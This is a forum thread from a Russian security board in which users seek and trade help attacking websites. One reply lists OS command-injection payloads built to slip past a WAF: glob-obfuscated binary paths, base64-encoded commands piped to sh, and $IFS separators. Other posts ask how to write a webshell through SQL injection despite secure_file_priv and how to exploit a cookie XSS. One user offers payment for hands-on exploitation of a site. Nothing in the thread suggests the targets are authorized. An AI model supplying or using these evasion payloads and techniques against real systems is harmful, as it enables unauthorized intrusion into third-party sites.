ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

15.04.2019, 19:16
|
|
Guest
Сообщений: n/a
Провел на форуме: 169212
Репутация:
441
|
|
Сообщение от man474019
man474019 said:
↑
hi all
os command injection in post data, mod_sec waf..when try echo test, it works
but when try uname, ls, pwd, dir waf deletes command, what real advice ?
Hi, try this:
Код:
Code:
/b?n/?s /
/b?n/un?m?
/?in/e??o "bHMgLWxh" | /?sr/b?n/b??e64 -d | /b?n/?h
|
|
|
|

16.04.2019, 17:08
|
|
Guest
Сообщений: n/a
Провел на форуме: 169212
Репутация:
441
|
|
Сообщение от man474019
man474019 said:
↑
response
It seems that there are some unknown logic on backend, not traditional WAF. Try to fuzz and detect the white/black sequences and conduct the attack vector in accordance with the circumstances. For example:
Код:
Code:
;id;
`id`
;sleep 100;
`sleep 100`
uname${IFS}-a
echo$IFS"bHMgLWxh"|base64$IFS-d|sh
`echo$IFS"bHMgLWxh"|base64$IFS-d|sh>log.txt`
and so on...
Also check this.
|
|
|
|

16.04.2019, 19:19
|
|
Guest
Сообщений: n/a
Провел на форуме: 238786
Репутация:
40
|
|
Сообщение от man474019
man474019 said:
↑
@crlf
thank you for reply, I tried these variant for reading /etc/passwd, and now also tried your variants, but also WAF cuts functions (((
request
response
А ты чего ожидал от твоей команды ?
|
|
|
|

23.04.2019, 12:34
|
|
Guest
Сообщений: n/a
Провел на форуме: 4317
Репутация:
4
|
|
Подскажите как загрузить шелл через SQLi
union based иньекция
FILE_PRIV = Y (5.5.60-log)
Включен --secure-file-priv соответственно into outfile не рабоатет.
|
|
|
|

23.04.2019, 16:04
|
|
Guest
Сообщений: n/a
Провел на форуме: 4317
Репутация:
4
|
|
Сообщение от man474019
man474019 said:
↑
hi
see if magic_quotes_gpc ON or OFF
you must find writable path/folder to upload your shell
and also you can try LOAD DATA INFILE
Yes i can upload file data to table, but im looking for way write data to file.
magic_quotes_gpc = off
|
|
|
|

23.04.2019, 17:35
|
|
Guest
Сообщений: n/a
Провел на форуме: 238786
Репутация:
40
|
|
Сообщение от xmp
xmp said:
↑
Подскажите как загрузить шелл через SQLi
union based иньекция
FILE_PRIV = Y (5.5.60-log)
Включен --secure-file-priv соответственно into outfile не рабоатет.
попробуй переопределить, но скорее всего никак
|
|
|
|

23.04.2019, 17:57
|
|
Guest
Сообщений: n/a
Провел на форуме: 4317
Репутация:
4
|
|
Сообщение от BabaDook
BabaDook said:
↑
попробуй переопределить, но скорее всего никак
Запись на включение находится в /etc/my.cnf
Верно понимаю что ты имеешь в виду?
Сообщение от None
mysql>
SHOW VARIABLES LIKE "secure_file_priv";
+------------------+-----------------------+
| Variable_name | Value |
+------------------+-----------------------+
| secure_file_priv |
/var/lib/mysql-files/
|
|
|
|
|

23.04.2019, 18:05
|
|
Guest
Сообщений: n/a
Провел на форуме: 238786
Репутация:
40
|
|
|
|
|
|

30.04.2019, 20:14
|
|
Guest
Сообщений: n/a
Провел на форуме: 61136
Репутация:
32
|
|
Есть уязвимость, Cross site scripting в куках
GET site/eta.php HTTP/1.1
Referer: https://www.google.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/45.0.2228.0 Safari/537.21
Cookie: cache= Cross site scripting
Есть пример эксплуатации такой уязвимости ?
|
|
|
|

30.04.2019, 22:50
|
|
Guest
Сообщений: n/a
Провел на форуме: 6200
Репутация:
0
|
|
Может ли кто попробовать раскрутить уязвимость руками, в sqlmap никак не идет, но думаю надо руками. Сайт скину в личку. На пиво скину)
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|